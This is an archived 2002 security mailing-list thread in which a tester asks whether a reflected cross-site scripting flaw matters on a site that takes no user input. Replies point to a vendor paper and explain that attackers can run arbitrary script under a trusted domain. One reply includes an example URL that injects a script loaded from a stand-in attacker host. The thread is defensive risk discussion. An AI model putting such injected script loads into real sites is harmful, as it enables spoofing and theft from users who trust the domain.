Re: XSS

[Stephen de Vries <dv8 () omega arcbox com>]

The real probelm with XSS is that an attacker abuses the trust that a
legitimate client has in your domain.  An attacker can execute ANY
javascript (or HTML) under the guise of the trusted domain, if a script in
that domain is vulnerable to XSS.  For example, an attacker can use
javascript to rewrite an entire HTML page, providing false information
under the guise of www.trusteddomain.com/search?<script
src="www.attacker.com/myscript.js"></script>
thereby subverting the trust that clients put in your domain.

Stephen.


On Tue, 10 Dec 2002, John Madden wrote:

> Hi All,
>
> Thanks to everyone for their responses.
>
> Maybe i did not express myself well enough. What I
> wanted to know is if a site is vulnerable to XSS but
> doesn't allow any write operation, any postings for
> other users to actualy use the malicious URL, can it
> be used for something else ? The reason i'm asking is
> that the company I work for is vulnerable but doesn't
> allow any kind of user input (basicly it's just
> information site) We have to weight the treath vs
> cost, if nothing can be done with the XSS (no to say
> that they will never allow any user input...) then it
> will have a lower priority in the recommendations and
> if to fix all the web pages cost mucho $$$$ then we
> have to consider that as well.
>
> Any ideas ?
>
> --- Kevin Spett <kspett () spidynamics com> wrote:
> > We've got an XSS paper that describes a real attack
> > in technical detail.
> > The scenario it uses is a bank login page that uses
> > client-supplied data for
> > a login-failed error message.
> >
> > http://www.spidynamics.com/mktg/xss
> >
> >
> > I hope it helps.
> >
> >
> >
> > Kevin Spett
> > SPI Labs
> > http://www.spidynamics.com/
> >
> > ----- Original Message -----
> > From: "John Madden" <chiwawa999 () yahoo com>
> > To: <webappsec () securityfocus com>
> > Sent: Tuesday, December 10, 2002 9:38 AM
> > Subject: XSS
> >
> >
> > > Hello all,
> > >
> > > Being new to XSS and seing alot of messages in the
> > > last couple weeks on the subject got me
> > wondering...
> > > What is the real vulnerability if the site in
> > > questions is vulnerable to XSS but does not let
> > you
> > > write any malicious scripts on the system, like
> > > message board, forums etc... ? Can anything be
> > done to
> > > exploit XSS if the above scenario occurs ? I know
> > it
> > > depends on the web server, packages installed
> > etc...
> > > I'm asking in generaly is it possible ?
> > >
> > > You can do the document.cookie and view your
> > > cookie, that migth give a hint on the structure
> > but...
> > > or redirect yourself to another web site :) etc...
> > >
> > > I've read the document on XSS by David Endler
> > > http://www.idefense.com/papers.html but still have
> > > some questions.
> > >
> > > If possible, can the XSS guru's on the list shed
> > some
> > > light on the subject.
> > >
> > > Thanks for your time,
> > >
> > > Cheers
> > >
> > >
> > > __________________________________________________
> > > Do you Yahoo!?
> > > Yahoo! Mail Plus - Powerful. Affordable. Sign up
> > now.
> > > http://mailplus.yahoo.com
>
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com